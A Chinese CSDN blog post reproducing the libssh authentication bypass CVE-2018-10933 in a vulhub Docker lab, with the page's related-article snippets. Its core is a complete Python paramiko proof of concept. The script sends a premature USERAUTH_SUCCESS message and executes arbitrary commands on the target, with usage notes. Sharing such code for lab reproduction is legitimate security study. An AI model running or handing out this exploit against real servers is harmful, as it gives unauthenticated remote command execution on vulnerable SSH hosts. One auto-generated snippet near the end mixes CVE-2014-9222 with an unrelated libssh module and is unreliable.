libssh 服务端权限认证绕过漏洞(CVE-2018-10933)

最新推荐文章于 2024-04-17 09:56:14 发布
最新推荐文章于 2024-04-17 09:56:14 发布
阅读量749 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118567303
版权
该博客介绍了libssh服务端存在的逻辑错误漏洞,允许攻击者在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证直接执行命令。通过提供的Poc代码,可以复现该漏洞。该漏洞涉及SSH服务器安全,可能引发未授权访问风险。
摘要由CSDN通过智能技术生成

漏洞简介

libssh是一个提供ssh相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标SSH服务器。

漏洞复现

我们直接用Poc来复现:
来源于:https://github.com/vulhub/vulhub/tree/master/libssh/CVE-2018-10933

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

用python3运行即可执行命令
在这里插入图片描述
注意,这里的2222端口是docker的sshd服务22端口映射出物理机主机的端口,所以脚本参数需要填上2222
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-10933 身份验证绕过漏洞验证
玄道的网安博客
10-28 6879
0x00 事件背景 2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题 libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可...
buuctf [Libssh]CVE-2018-10933
qq_1873822的博客
03-27 343
漏洞描述 2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题 libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可以进行一些恶意操作。 https://blog.csdn.net/xuandao_ahfengren/article/deta
libssh 认证绕过漏洞(cve-2018-10933)分析
whatday的专栏
08-25 2037
最近出了一个libSSH认证绕过漏洞,刚开始时候看的感觉这洞可能挺厉害的,然后很快github上面就有PoC了,msf上很快也添加了exp,但是在使用的过程中发现无法getshell,对此,我进行了深入的分析研究。 前言 360发了一篇分析文章,有getshell的图: Python版本的PoC到Github上搜一下就有了: https://github.com/search?utf8=%E2%9C%93&q=CVE-2018-10933&type= 环境 libSSH-0.
CVE-2018-10933:使用CVE-2018-10933LibSSH)无需任何凭据即可生成shell
03-02
绕过使用CVE-2018-10933无需任何凭据即可生成shell 漏洞数据库: : libSSH有关CVE-2018-10933的信息: ://www.libssh.org/security/advisories/CVE-2018-10933.txt libSSH发行的Bugfix: ://...
K8 weblogic-CVE-2018-2628-getshell工具
07-13
【K8 weblogic-CVE-2018-2628-getshell工具】是一款针对Oracle WebLogic服务器的渗透测试工具,主要用于检测和利用CVE-2018-2628安全漏洞获取服务器的shell控制权。这个工具集成了漏洞的详细利用过程,包括图片教程...
libssh2-1.11.0 x64 Windows版 动态/静态lib
01-09
libssh2-1.11.0 x64 Win版 动态/静态lib Release版 三个文件: 静态库 libssh2_static.lib 动态库 libssh2.dll libssh2.lib 头文件 libssh2.h libssh2_publickey.h libssh2_sftp.h 附:------- 已启动生成… 1>-----...
libssh2-devel-1.4.2-2.el6_7.1安装包.rar
02-17
yum install libssh2-devel的时候提示如下的信息,安装附件中的包可以进行解决 Total download size: 2.0 M Installed size: 5.0 M Is this ok [y/N]: y Downloading Packages: Error Downloading ...
libssh2-1.9.0.rar
05-07
**libssh2库详解** `libssh2`是一个开源的C语言库,它实现了SSH2协议,用于在不同系统之间安全地传输数据。这个库广泛应用于各种需要远程控制、文件传输或者加密通信的软件开发中。`libssh2-1.9.0`是该库的一个特定...
linux下的ssh客户端,基于libssh2:连接ssh服务器,发送命令,并获取返回的结果
10-21
linux下的ssh客户端,基于libssh2:连接ssh服务器,发送命令,并获取返回的结果。 纯c代码,可gcc直接编译。
libssh2.zip
07-26
[root@sdw1 ~]# rpm -qa|grep libssh2 卸载 [root@sdw1 libssh2]# rpm -e --nodeps libssh2-1.4.3-10.el7_2.1.x86_64 上传版本包并安装 [root@sdw1 libssh2]# rpm -ivh libssh2-1.4.3-12.el7.x86_64.rpm [root@sdw1 libssh2]# rpm -qa|grep libssh2
libssh2.lib libssh2.dll以及头文件 版本:1.7.0
05-28
libssh2.lib libssh2.dll以及头文件 版本:1.7.0 编译环境:win10 vs2015 基于当前最新版本。动态链接,提供lib文件以及对应头文件。研究了很久所以资源分较高
libssh2-1.8.0.tar
10-13
Linux下解压方法 tar xzvf filename
libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现
Senimo
05-03 2077
CVE-2018-10933 libssh 服务端权限认证绕过漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 libssh 是一个提供 SSH 相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。 二、漏洞影响 libssh 0.6 及更高版本具有身份验证绕过漏洞libssh 版本 0.8.4 和 libssh
探索CVE-2018-10933:一个开源的安全研究与学习平台
最新发布
gitblog_00052的博客
04-17 328
探索CVE-2018-10933:一个开源的安全研究与学习平台 项目地址:https://gitcode.com/blacknbunny/CVE-2018-10933 在网络安全的世界里,了解并应对漏洞是至关重要的。今天,我们将深入探讨一个开源项目,它专注于研究和学习一个特定的漏洞——CVE-2018-10933。该项目由GitHub上的用户blacknbunny创建,旨在帮助技术爱好者、安全研究...
libssh 服务端权限认证绕过(CVE-2018-10933)
m0_65150886的博客
12-27 406
相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。官方已发布不受影响版本。已修复版本Libssh 0.8.4和0.7.6下载链接如下:https://www.libssh.org/files。2.poc利用,python poc.Sh ip port ‘命令’注意:使用OpenSSHSSH服务不受影响。1.访问ip:port,显示无法使用此页面。
利用Vulnhub复现漏洞 - libssh 服务端权限认证绕过漏洞CVE-2018-10933
JiangBuLiu的博客
07-12 1870
libssh 服务端权限认证绕过漏洞CVE-2018-10933)Vulnhub官方复现教程漏洞原理复现过程启动环境PoC (pocsuite 插件)执行任意命令 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md 漏洞原理 libssh是一个提供ssh相...
CVE-2014-9222
07-28
CVE-2014-9222是一种安全漏洞,攻击者可以利用该漏洞通过路由管理协议TR-069的7547端口发送恶意流量来控制设备。\[2\]这个漏洞的存在使得攻击者能够绕过身份验证并执行未经授权的操作。\[3\]如果你想进一步了解这个漏洞的详细信息,你可以使用Metasploit框架中的auxiliary/scanner/ssh/libssh_auth_bypass模块进行交互。\[1\] #### 引用[.reference_title] - *1* *3* [ctf:kali2:扫描ssh端口版本尝试auxiliary/scanner/ssh/ssh_version](https://blog.csdn.net/viviliving/article/details/128254919)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [近十万台路由器组成僵尸网络,专门向WordPress网站发起撞库攻击](https://blog.csdn.net/weixin_34293059/article/details/90356748)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值